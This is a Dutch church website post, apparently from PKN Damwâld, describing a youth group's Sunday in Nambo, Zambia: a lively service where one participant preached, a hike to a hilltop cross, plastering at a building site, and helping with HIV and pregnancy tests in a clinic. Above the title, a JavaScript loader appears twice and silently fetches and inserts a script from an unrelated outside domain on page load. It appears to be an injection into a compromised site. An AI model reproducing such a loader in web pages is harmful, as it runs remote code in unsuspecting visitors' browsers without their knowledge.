;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ZA317 | Zambiaanse zondag - PKN Damwâld

ZA317 | Zambiaanse zondag

Gepubliceerd op: maandag 14 augustus 2017

Zo ziet een Zambiaanse zondag eruit. Jan en Alie vertellen welk persoonlijk projectdoel Carlijn afvinkt en wat er verder gebeurt in Nambo en omstreken:

We hebben gisteren genoten van een typische Afrikaanse kerkdienst, met drums en dans. Fantastisch! Carlijn heeft haar persoonlijk projectdoel afgevinkt: ze heeft gepreekt in Afrika. Na de dienst zijn we met de hele groep de berg op gegaan. Een leuke klim, die werd beloond met een prachtig uitzicht. Bijzonder om zo met z’n allen bij het kruis te staan dat we steeds ver weg zagen staan. We hebben de zondag afgesloten met een vraag & antwoord programma met coördinator Michael. Heel leerzaam.

Vandaag zetten we de puntjes op de i op de bouwplaats. We zijn druk aan het pleisteren en schilderen een gedenkteken op het gebouw. Alie en Jan zijn op het moment op bezoek in Miloso. Indrukwekkend om daar te zien hoe de visie van Michael werkelijkheid wordt. Een paar van onze deelnemers heeft in de kliniek in Miloso geholpen met zwangerschaps- en HIV-testen. Ongelooflijk heftig om te zien dat leeftijdsgenoten horen dat ze HIV-positief zijn. Er is ook een groep op bezoek in het ziekenhuis, om te kijken hoe daar alles werkt.

We genieten nog steeds van een gave tijd in Nambo.